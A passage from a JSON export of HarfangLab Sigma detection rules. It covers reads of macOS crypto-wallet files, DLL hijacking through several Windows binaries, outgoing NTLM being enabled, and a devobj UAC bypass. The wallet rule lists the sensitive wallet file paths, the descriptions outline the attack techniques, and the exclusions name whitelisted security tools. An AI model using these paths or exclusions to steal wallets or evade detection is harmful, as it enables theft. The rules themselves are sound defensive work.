"https://attack.mitre.org/techniques/T1555/003/"
],
"name": "t1552_004_read_crypto_wallets_sensitive_files_macos.yml",
"content": "title: Suspicious Access to Crypto Wallet Sensitive Files\nid: 52fe691a-20e5-47ef-87f1-d8fc6bdef244\ndescription: |\n Detects a process reading sensitive cryptocurrency wallet files.\n Adversaries may access these files in order to steal cryptocurrencies.\n It is recommended to verify if the process performing the read operation has legitimate reasons to do so.\nreferences:\n - https://attack.mitre.org/techniques/T1539/\n - https://attack.mitre.org/techniques/T1555/003/\ndate: 2024/06/18\nmodified: 2026/01/06\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1539\n - attack.t1555.003\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith:\n - '/Users/*/.electrum/wallets/' # deskwallets/Electrum\n - '/Users/*/Library/Application Support/Coinomi/wallets/' # deskwallets/Coinomi\n - '/Users/*/Library/Application Support/Exodus/' # deskwallets/Exodus\n - '/Users/*/Library/Application Support/atomic/Local Storage/leveldb/' # deskwallets/Atomic\n - '/Users/*/.walletwasabi/client/Wallets/' # deskwallets/Wasabi\n - '/Users/*/Library/Application Support/Ledger Live/' # deskwallets/Ledger Live\n - '/Users/*/Monero/wallets/' # deskwallets/Feather (Monero)\n - '/Users/*/Library/Application Support/Bitcoin/wallets/' # deskwallets/Bitcoin Core\n - '/Users/*/Library/Application Support/Litecoin/wallets/' # deskwallets/Litecoin Core\n - '/Users/*/Library/Application Support/DashCore/wallets/' # deskwallets/Dash Core\n - '/Users/*/.electrum-ltc/wallets/' # deskwallets/Electrum LTC\n - '/Users/*/.electron-cash/wallets/' # deskwallets/Electron Cash\n - '/Users/*/Library/Application Support/Guarda/' # deskwallets/Guarda\n - '/Users/*/Library/Application Support/Dogecoin/wallets/' # deskwallets/Dogecoin Core\n - '/Users/*/Library/Application Support/Binance/app-store.json'\n ProcessImage|contains: '?'\n\n filter_binance:\n Image|endswith: '/Applications/Binance.app/Contents/MacOS/Binance'\n\n filter_exodus:\n Image|startswith: '/applications/exodus.app/contents/'\n\n # Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: '/Library/SystemExtensions/????????-????-????-????-????????????/'\n exclusion_virtualization:\n Image: '/System/Library/Frameworks/Virtualization.framework/Versions/A/XPCServices/com.apple.Virtualization.VirtualMachine.xpc/Contents/MacOS/com.apple.Virtualization.VirtualMachine'\n\n ### security tools ###\n exclusion_hurukai:\n Image: '/Applications/HarfangLab Hurukai.app/Contents/MacOS/hurukai'\n exclusion_fortinet:\n Image:\n - '/Library/Application Support/Fortinet/FortiClient/bin/fmon2.app/Contents/MacOS/fmon2'\n - '/Library/Application Support/Fortinet/FortiClient/bin/fcaptmon'\n - '/Library/Application Support/Fortinet/FortiClient/bin/scanunit'\n exclusion_microsoft_defender:\n Image:\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon_enterprise.app/Contents/MacOS/wdavdaemon_enterprise'\n - '/Applications/Microsoft Defender.app/Contents/MacOS/wdavdaemon'\n exclusion_fsecure:\n Image:\n - '/usr/local/f-secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fscesproviderd.xpc/Contents/MacOS/fscesproviderd'\n - '/Library/F-Secure/bin/fsavd.app/Contents/MacOS/fsavd'\n exclusion_bitdefender:\n Image: '/Library/Bitdefender/AVP/product/bin/BDLDaemon.app/Contents/MacOS/BDLDaemon'\n exclusion_eset:\n Image:\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_sci'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/esets_gui'\n - '/Applications/ESET Endpoint Antivirus.app/Contents/MacOS/esets_daemon'\n - '/Applications/ESET Cyber Security.app/Contents/MacOS/esets_daemon'\n exclusion_withssecure:\n Image:\n - '/Library/WithSecure/bin/wsesproviderd.xpc/Contents/MacOS/wsesproviderd'\n - '/Library/WithSecure/bin/wsavd.app/Contents/MacOS/wsavd'\n exclusion_sentinel:\n Image: '/Library/Sentinel/sentinel-agent.bundle/Contents/MacOS/sentineld_helper.app/Contents/MacOS/sentineld_helper'\n exclusion_avast:\n Image: '/Applications/Avast.app/Contents/Backend/utils/com.avast.Antivirus.EndpointSecurity.app/Contents/MacOS/com.avast.Antivirus.EndpointSecurity'\n exclusion_trend:\n Image: '/Applications/TrendMicroSecurity.app/Contents/Resources/iCoreService.app/Contents/MacOS/iCoreService'\n exclusion_sophos:\n Image: '/Library/Sophos Anti-Virus/SophosScanAgent.app/Contents/MacOS/SophosScanAgent'\n\n ### backup sofware ###\n exclusion_arq:\n Image: '/Applications/Arq.app/Contents/Resources/ArqAgent.app/Contents/MacOS/ArqAgent'\n\n # AtempoLiveNavigator\n exclusion_hnagent:\n Image: '/Library/Application Support/HN/base/bin/HNagent'\n\n exclusion_wddesktop:\n Image:\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/kdd'\n - '/Library/Application Support/WDDesktop.app/Contents/Resources/wdsync'\n\n ### misc\n exclusion_vscode:\n Image:\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n - '/Users/*/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper'\n # end common exclusion\n\n exclusion_ledger:\n Image|startswith:\n - '/Applications/Ledger Live.app/Contents/'\n - '/Applications/Ledger Wallet.app/Contents/'\n\n exclusion_google_update:\n Image:\n - '/Library/Application Support/Google/GoogleUpdater/*/GoogleUpdater.app/Contents/MacOS/GoogleUpdater'\n - '/users/*/library/application support/google/googleupdater/*/googleupdater.app/contents/macos/googleupdater'\n\n condition: all of selection_* and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "52fe691a-20e5-47ef-87f1-d8fc6bdef244",
"rule_name": "Suspicious Access to Crypto Wallet Sensitive Files",
"rule_description": "Detects a process reading sensitive cryptocurrency wallet files.\nAdversaries may access these files in order to steal cryptocurrencies.\nIt is recommended to verify if the process performing the read operation has legitimate reasons to do so.\n",
"rule_creation_date": "2024-06-18",
"rule_modified_date": "2026-01-06",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1539",
"attack.t1555.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5301e669-0941-4751-a135-cbd3416b47ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.619010Z",
"creation_date": "2026-03-23T11:45:34.619012Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.619016Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_logagent.yml",
"content": "title: DLL Hijacking via logagent.exe\nid: 5301e669-0941-4751-a135-cbd3416b47ee\ndescription: |\n Detects potential Windows DLL Hijacking via logagent.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'logagent.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\wininet.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5301e669-0941-4751-a135-cbd3416b47ee",
"rule_name": "DLL Hijacking via logagent.exe",
"rule_description": "Detects potential Windows DLL Hijacking via logagent.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "53073bd4-bc9f-4328-a7c0-c3e5a4410db7",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600287Z",
"creation_date": "2026-03-23T11:45:34.600290Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600298Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dfrgui.yml",
"content": "title: DLL Hijacking via dfrgui.exe\nid: 53073bd4-bc9f-4328-a7c0-c3e5a4410db7\ndescription: |\n Detects potential Windows DLL Hijacking via dfrgui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dfrgui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\defragproxy.dll'\n - '\\propsys.dll'\n - '\\SXSHARED.dll'\n - '\\windows.storage.dll'\n - '\\windowscodecs.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "53073bd4-bc9f-4328-a7c0-c3e5a4410db7",
"rule_name": "DLL Hijacking via dfrgui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dfrgui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5329f89f-c4d1-4084-ae5a-44c204cb0413",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586418Z",
"creation_date": "2026-03-23T11:45:34.586421Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586429Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wiawow64.yml",
"content": "title: DLL Hijacking via wiawow64.exe\nid: 5329f89f-c4d1-4084-ae5a-44c204cb0413\ndescription: |\n Detects potential Windows DLL Hijacking via wiawow64.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wiawow64.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\ScanSetting.DLL'\n - '\\UxTheme.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5329f89f-c4d1-4084-ae5a-44c204cb0413",
"rule_name": "DLL Hijacking via wiawow64.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wiawow64.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5333b226-43ac-4db0-ae99-03b37b486dc5",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.621752Z",
"creation_date": "2026-03-23T11:45:34.621754Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.621758Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html",
"https://attack.mitre.org/techniques/T1562/001/",
"https://attack.mitre.org/techniques/T1112/"
],
"name": "t1562_001_ntlm_auth_enable.yml",
"content": "title: Outgoing NTLM Traffic Enabled\nid: 5333b226-43ac-4db0-ae99-03b37b486dc5\ndescription: |\n Detects when outgoing NTLM authentication is enabled in the Windows registry.\n The modification of RestrictSendingNTLMTraffic registry value to 0 permits to use NTLM as authentication mechanism.\n This weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\n It is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\nreferences:\n - https://threathunterplaybook.com/hunts/windows/191224-RegModExtendedNetNTLMDowngrade/notebook.html\n - https://attack.mitre.org/techniques/T1562/001/\n - https://attack.mitre.org/techniques/T1112/\ndate: 2025/06/20\nmodified: 2026/03/16\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.SystemModification\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\MSV1_0\\RestrictSendingNTLMTraffic'\n Details: 'DWORD (0x00000000)'\n ProcessParentImage|contains: '?'\n\n # This excludes registry modifications coming from local security strategies.\n exclusion_services:\n ProcessImage: '?:\\Windows\\System32\\services.exe'\n ProcessParentImage: '?:\\Windows\\System32\\wininit.exe'\n ProcessUserSID: 'S-1-5-18'\n\n exclusion_template_gpo:\n ProcessImage|endswith: '\\svchost.exe'\n ProcessCommandLine:\n - '?:\\Windows\\system32\\svchost.exe -k GPSvcGroup'\n - '?:\\WINDOWS\\system32\\svchost.exe -k GPSvcGroup -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -s gpsvc'\n - '?:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc'\n - '?:\\Windows\\System32\\svchost.exe -k netsvcs' # (Windows Server 2012 and 2016)\n - '?:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p'\n - '?:\\WINDOWS\\system32\\svchost.exe -k UserProfileService -p -s gpsvc'\n ProcessUserSID: 'S-1-5-18'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_deviceenroller:\n ProcessImage: '?:\\Windows\\System32\\DeviceEnroller.exe'\n\n exclusion_sccm:\n ProcessAncestors|contains:\n - '?:\\MININT\\Tools\\X64\\TsManager.exe'\n - '?:\\MININT\\Tools\\X64\\TsmBootstrap.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "5333b226-43ac-4db0-ae99-03b37b486dc5",
"rule_name": "Outgoing NTLM Traffic Enabled",
"rule_description": "Detects when outgoing NTLM authentication is enabled in the Windows registry.\nThe modification of RestrictSendingNTLMTraffic registry value to 0 permits to use NTLM as authentication mechanism.\nThis weakens the security of network authentications and can be used by attackers to extract the NTLM hash.\nIt is recommended to analyze the process responsible for this registry edit as well as for malicious actions in this user session.\n",
"rule_creation_date": "2025-06-20",
"rule_modified_date": "2026-03-16",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "534a0e88-946f-4ee2-b2c4-9862a027c71c",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.078062Z",
"creation_date": "2026-03-23T11:45:34.078064Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.078068Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198"
],
"name": "t1548_002_uac_bypass_devobj.yml",
"content": "title: UAC Bypass Executed via devobj\nid: 534a0e88-946f-4ee2-b2c4-9862a027c71c\ndescription: |\n Detects the execution of the devobj.dll UAC bypass, involving the hijacking of the DLL via winsat.exe (Windows System Assessment Tool).\n This UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer) or IFileOperation autoelevation.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\nreferences:\n - https://github.com/hfiref0x/UACME/blob/v3.2.7/Source/Akagi/methods/hybrids.c#L198\ndate: 2021/01/06\nmodified: 2025/04/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.001\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image:\n - '*\\Windows\\SysWOW64\\\\*'\n - '*\\Windows\\System32\\sysprep\\\\*'\n ImageLoaded|endswith: '\\devobj.dll'\n\n filter_signed:\n Signed: 'true'\n Signature|contains: 'Microsoft Windows'\n\n filter_no_info:\n - ImageSize: -1\n - ImageLoaded: '\\Windows\\\\*' # image starts with \\windows\\ instead of ?:\\windows, so no info possible\n\n exclusion_not_signed:\n sha256:\n - '209ff1b6d46d1ac99518fcf54f2f726143b2dbf2c5fda90212fbef7526f7cbf5' # devobj.dll version 6.1.7601.17621 (win7sp1_gdr.110523-2108)\n - '06d6cdcc3f72f957c22c6b6357673a209ce362d2151ab2f9644a20585da4cfe6' # devobj.dll version 6.1.7601.23403 (win7sp1_ldr.160325-0600)\n - '01104182e4e6fb3cf6397936d30b2ce3486967586d1b94187b59a8232dae39ff' # devobj.dll version 6.1.7600.16385 (win7_rtm.090713-1255)\n - 'f87c84bb169cd301ccec1e51a4c94c05edd22d9df339b2c7bb8401a3309cc841' # devobj.dll version 10.0.19041.3155 (WinBuild.160101.0800)\n\n exclusion_legitimate:\n ImageLoaded:\n - '?:\\Windows\\SysWOW64\\devobj.dll'\n - '?:\\Windows\\system32\\devobj.dll'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "534a0e88-946f-4ee2-b2c4-9862a027c71c",
"rule_name": "UAC Bypass Executed via devobj",
"rule_description": "Detects the execution of the devobj.dll UAC bypass, involving the hijacking of the DLL via winsat.exe (Windows System Assessment Tool).\nThis UAC bypass method acquires elevation through abusing APPINFO.DLL whitelisting model logic and the wusa installer (Windows Update Standalone Installer) or IFileOperation autoelevation.\nAdversaries may bypass UAC mechanisms to elevate process privileges on system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the child and parent processes and user session to look for malicious content or actions.\n",
"rule_creation_date": "2021-01-06",
"rule_modified_date": "2025-04-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1548.002",
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "5353f2e2-31d5-43e8-a979-c50711169465",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070834Z",
"creation_date": "2026-03-23T11:45:34.070836Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070840Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.blue-prints.blog/content/blog/posts/lolbin/addinutil-lolbas.html",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_addinutil_suspicious_commandline.yml",
